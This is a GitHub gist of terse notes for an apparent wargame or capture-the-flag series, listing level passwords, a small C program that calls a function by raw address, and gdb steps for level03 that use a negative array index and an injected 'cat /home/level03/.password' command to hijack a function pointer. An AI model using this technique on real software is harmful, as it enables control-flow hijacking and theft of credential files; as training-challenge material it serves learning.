Skip to content

Instantly share code, notes, and snippets.

@bmcculley
Created September 26, 2018 03:34
Show Gist options
  • Save bmcculley/0adcb0cf513102e828a39f570327d325 to your computer and use it in GitHub Desktop.
Save bmcculley/0adcb0cf513102e828a39f570327d325 to your computer and use it in GitHub Desktop.
Cheat sheet
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
void run() {
system("whoami");
}
int main(int argc, char const *argv[])
{
printf("Address: %p\n", run);
// this will call run();
// compile and use gdb to get the address of run
// gdb ./a.out
// (gdb) print run
// put that address in place of "<address>" recompile and run
/*
int (*func)(void) = (int (*)(void))<address>;
func();
*/
return 0;
}
level00
pass: izeecahd
level01
pass: aepeefoo
level02
pass: quemaosh
level03
run address:
0x804879b
run 0 abcd
x/64xb buf
print fns
print &buf
print (fns - buf) / 4
27
run -27 "`echo -e "\x9b\x87\x04\x08"`"
run -27 "`echo -e "cat /home/level03/.password;#\x9b\x87\x04\x08"`"
run -20 "`echo -e "cat /home/level03/.password;\x9b\x87\x04\x08"`"
pass: eingaima
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment